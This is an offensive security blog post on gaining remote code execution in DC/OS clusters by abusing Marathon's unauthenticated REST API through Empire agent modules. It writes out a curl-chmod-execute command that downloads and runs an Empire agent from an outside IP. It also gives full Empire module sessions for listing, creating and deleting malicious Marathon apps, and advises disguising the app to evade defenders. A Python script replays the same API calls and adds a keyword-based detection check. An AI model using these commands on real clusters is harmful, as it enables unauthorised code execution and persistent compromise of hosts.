OWNerchestration - Marathon (ab)Use

We can gain Remote Code Execution (RCE) on servers within the cluster using the Marathon service. Marathon is usually the first framework launched on a DC/OS cluster and runs directly alongside Mesos as its long-running service scheduler: it restarts any service, container, or framework that dies, so whatever it is asked to run is kept running indefinitely. Because a Marathon app's "cmd" is executed as a Mesos task on whichever agent node accepts the offer, the ability to create apps is the ability to run commands on cluster hosts.

Marathon's REST API (TCP 8080) requires no authentication by default, so an attacker who can reach it, here through an existing Empire agent inside the cluster, can use it to gain RCE on servers within the cluster with the Empire modules shown below. In these examples we execute the following command, which downloads the Empire ELF agent onto the remote servers within the DC/OS cluster and runs it:

curl -o /tmp/emPyre -s http://138.68.47.120:8000/emPyre && chmod +x /tmp/emPyre && /tmp/emPyre

This is not the stealthiest or most OPSEC-friendly way to get RCE on these endpoints, but it can easily be improved to blend into a target environment: list the existing apps via the Marathon API, study what their commands, images, and resource settings look like, and craft an app definition that looks benign on that network. This exercise is left up to the reader.

List Marathon Jobs

We can use the "http_rest_api" module to list Marathon apps with a GET to /v2/apps. The Target "marathon.mesos" is the Mesos-DNS name for the Marathon service and only resolves from inside the cluster, which is why the request is made through the agent.

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/http_rest_api
(Empire: python/situational_awareness/network/http_rest_api)> set RequMethod GET
(Empire: python/situational_awareness/network/http_rest_api)> set Protocol http
(Empire: python/situational_awareness/network/http_rest_api)> set Target marathon.mesos
(Empire: python/situational_awareness/network/http_rest_api)> set Path /v2/apps
(Empire: python/situational_awareness/network/http_rest_api)> set Port 8080
(Empire: python/situational_awareness/network/http_rest_api)> execute

Add Marathon Job

We can use the "marathon_api_create_start_app" module to add a Marathon app. The value of Cmd becomes the "cmd" field of the app definition that the module POSTs to /v2/apps; Marathon then schedules it and Mesos runs it on an agent node.

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/dcos/marathon_api_create_start_app
(Empire: python/situational_awareness/network/dcos/marathon_api_create_start_app)> set Cmd curl -o /tmp/emPyre -s http://138.68.47.120:8000/emPyre && chmod +x /tmp/emPyre && /tmp/emPyre
(Empire: python/situational_awareness/network/dcos/marathon_api_create_start_app)> execute

Delete a Marathon Job

We can use the "http_rest_api" module to delete a Marathon app with a DELETE to /v2/apps/<app id>. The id in the Path (app001 below) must match the id of the app that was created; deleting it tells Marathon to kill the task and stop restarting it.

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/http_rest_api
(Empire: python/situational_awareness/network/http_rest_api)> set RequMethod DELETE
(Empire: python/situational_awareness/network/http_rest_api)> set Protocol http
(Empire: python/situational_awareness/network/http_rest_api)> set Target marathon.mesos
(Empire: python/situational_awareness/network/http_rest_api)> set Path /v2/apps/app001
(Empire: python/situational_awareness/network/http_rest_api)> set Port 8080
(Empire: python/situational_awareness/network/http_rest_api)> execute
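The three exchanges above (list, create, delete) are plain JSON calls against Marathon's /v2/apps endpoint and need nothing Empire-specific. The following is an added example, not code from the original post or from Empire: it performs the same three requests with the standard library against a minimal in-process stand-in for Marathon (constructed for the example; it records app definitions but does not run them), and adds the check a defender would run over the same listing, flagging apps whose cmd fetches and executes something. The app definition fields (id, cmd, cpus, mem, instances) are the documented Marathon ones; the fake server, its sample "/legit-web" app, and the keyword list are assumptions.

```python
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import ProxyHandler, Request, build_opener

# The stager command from the post, used as the app's cmd (any shell command works).
PAYLOAD_CMD = ("curl -o /tmp/emPyre -s http://138.68.47.120:8000/emPyre"
               " && chmod +x /tmp/emPyre && /tmp/emPyre")


class FakeMarathonServer(HTTPServer):
    """Constructed stand-in for Marathon: keeps app definitions in memory, runs nothing."""

    def __init__(self, addr, handler):
        super().__init__(addr, handler)
        # Sample pre-existing app (assumption) so the listing is not empty.
        self.apps = {"/legit-web": {"id": "/legit-web", "cmd": "python3 -m http.server 8000",
                                    "cpus": 0.1, "mem": 64, "instances": 2}}


class FakeMarathonHandler(BaseHTTPRequestHandler):
    def _send(self, code, body):
        data = json.dumps(body).encode()
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):  # GET /v2/apps -> {"apps": [...]}, as the http_rest_api module receives it
        if self.path == "/v2/apps":
            self._send(200, {"apps": list(self.server.apps.values())})
        else:
            self._send(404, {"message": "not found"})

    def do_POST(self):  # POST /v2/apps with an app definition -> 201 + the stored app
        app = json.loads(self.rfile.read(int(self.headers.get("Content-Length", 0))))
        app["id"] = app["id"] if app["id"].startswith("/") else "/" + app["id"]
        self.server.apps[app["id"]] = app
        self._send(201, app)

    def do_DELETE(self):  # DELETE /v2/apps/<id> -> 200 deployment, or 404 if unknown
        app_id = self.path[len("/v2/apps"):]
        if self.server.apps.pop(app_id, None) is None:
            self._send(404, {"message": "App '%s' does not exist" % app_id})
        else:
            self._send(200, {"deploymentId": "deploy-1", "version": "v1"})

    def log_message(self, *args):  # silence request logging
        pass


def marathon_request(base, method, path, body=None):
    """One JSON call to the Marathon API; returns (status, decoded body). No proxy, no auth."""
    data = json.dumps(body).encode() if body is not None else None
    req = Request(base + path, data=data, method=method,
                  headers={"Content-Type": "application/json"})
    try:
        with build_opener(ProxyHandler({})).open(req, timeout=5) as resp:
            return resp.status, json.loads(resp.read())
    except HTTPError as err:
        return err.code, json.loads(err.read())


def app_definition(app_id, cmd):
    """Minimal Marathon app definition; cmd is run by the default executor on an agent."""
    return {"id": app_id, "cmd": cmd, "cpus": 0.1, "mem": 32, "instances": 1}


# Defender side: substrings typical of download-and-run stagers (assumed list, tune per site).
SUSPICIOUS = ("curl ", "wget ", "/tmp/", "chmod +x", "| sh", "| bash", "base64 -d")


def suspicious_apps(listing):
    """Return ids of apps in a /v2/apps listing whose cmd looks like a fetch-and-execute stager."""
    return sorted(app["id"] for app in listing.get("apps", [])
                  if any(token in (app.get("cmd") or "") for token in SUSPICIOUS))


def run_demo(cmd=PAYLOAD_CMD, app_id="/app001"):
    """List, create, re-list (with the defender check), delete, and list again."""
    srv = FakeMarathonServer(("127.0.0.1", 0), FakeMarathonHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    base = "http://127.0.0.1:%d" % srv.server_address[1]
    try:
        before = marathon_request(base, "GET", "/v2/apps")[1]
        create_status, _ = marathon_request(base, "POST", "/v2/apps", app_definition(app_id, cmd))
        after = marathon_request(base, "GET", "/v2/apps")[1]
        flagged = suspicious_apps(after)
        delete_status, _ = marathon_request(base, "DELETE", "/v2/apps" + app_id)
        final = marathon_request(base, "GET", "/v2/apps")[1]
    finally:
        srv.shutdown()
        srv.server_close()
    return {"before": sorted(a["id"] for a in before["apps"]), "create_status": create_status,
            "after": sorted(a["id"] for a in after["apps"]), "flagged": flagged,
            "delete_status": delete_status, "final": sorted(a["id"] for a in final["apps"])}


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Against a real cluster the base URL would be http://marathon.mesos:8080 from a host inside it, and the POST would cause Mesos to actually execute the cmd on an agent; the stand-in only shows the shape of the traffic. The suspicious_apps check is the kind of thing to run periodically against /v2/apps (or against the Marathon event stream) if you operate such a cluster, since an unauthenticated Marathon leaves no other record of who created an app.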

Demo

You can see a quick demo of this process in the following video…

Bryce Kunz